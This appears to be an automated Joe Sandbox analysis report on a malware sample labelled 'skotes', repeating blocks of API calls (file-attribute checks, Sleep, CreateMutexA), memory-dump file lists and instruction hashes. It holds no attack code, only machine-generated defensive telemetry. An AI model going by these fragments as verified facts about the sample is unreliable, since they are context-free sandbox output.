                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 2068 609f44-609f64 GetFileAttributesA 2071 609f92-609fae 2068->2071 2072 609f66-609f72 2068->2072 2075 609fb0-609fbc 2071->2075 2076 609fdc-609ffb 2071->2076 2073 609f74-609f82 2072->2073 2074 609f88-609f8f call 61d663 2072->2074 2073->2074 2079 60a92b 2073->2079 2074->2071 2081 609fd2-609fd9 call 61d663 2075->2081 2082 609fbe-609fcc 2075->2082 2077 60a029-60a916 call 6180c0 2076->2077 2078 609ffd-60a009 2076->2078 2083 60a00b-60a019 2078->2083 2084 60a01f-60a026 call 61d663 2078->2084 2086 60a953-60a987 Sleep CreateMutexA 2079->2086 2087 60a92b call 636c6a 2079->2087 2081->2076 2082->2079 2082->2081 2083->2079 2083->2084 2084->2077 2097 60a98e-60a994 2086->2097 2087->2086 2098 60a996-60a998 2097->2098 2099 60a9a7-60a9a8 2097->2099 2098->2099 2100 60a99a-60a9a5 2098->2100 2100->2099 2102 60a9a9-60a9b0 call 636629 2100->2102
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00609F47
                                                                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 396266464-3713388386
                                                                                                                                                                                            • Opcode ID: 06505105f19e77b901845eb0f9f120f128f8fb73cbb8146aa5c8ffa1ea6dde47
                                                                                                                                                                                            • Instruction ID: 9af5b1d87e022ea0286e815bf80eafff6ee214984a6a319d23c73fcac235811f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 06505105f19e77b901845eb0f9f120f128f8fb73cbb8146aa5c8ffa1ea6dde47
                                                                                                                                                                                            • Instruction Fuzzy Hash: 913126317943049BEB0CDBACDC887AEB773EB85310F248618E014EB3D6C7758A808762
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 0060A07C
                                                                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 396266464-3713388386
                                                                                                                                                                                            • Opcode ID: ca488a7c269ee27dcbc38b7317a3a937b669cf9ff39abc4f079804144018dc3d
                                                                                                                                                                                            • Instruction ID: c87be246814975c1484345857f369d539afeac09b2a1d166eda4e18090bc6de7
                                                                                                                                                                                            • Opcode Fuzzy Hash: ca488a7c269ee27dcbc38b7317a3a937b669cf9ff39abc4f079804144018dc3d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 36312531B943449BEB0CDBBCCD89BAEB773DB85310F248658E0149B3D5C77699808756
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 0060A1B1
                                                                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 396266464-3713388386
                                                                                                                                                                                            • Opcode ID: 162b53ce28306a7f2d49515ff1b4859d4829cb7979ce07a8b471c03078cffa1b
                                                                                                                                                                                            • Instruction ID: 9fa5a2eb092cbda8f795b75a9d95899cb03cb3166d7706aa952c42aae394dcea
                                                                                                                                                                                            • Opcode Fuzzy Hash: 162b53ce28306a7f2d49515ff1b4859d4829cb7979ce07a8b471c03078cffa1b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 93312831B943449BEB0CDBECDD897AEB773AB86310F244668E0149B3D5D7758A808752
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 0060A2E6
                                                                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
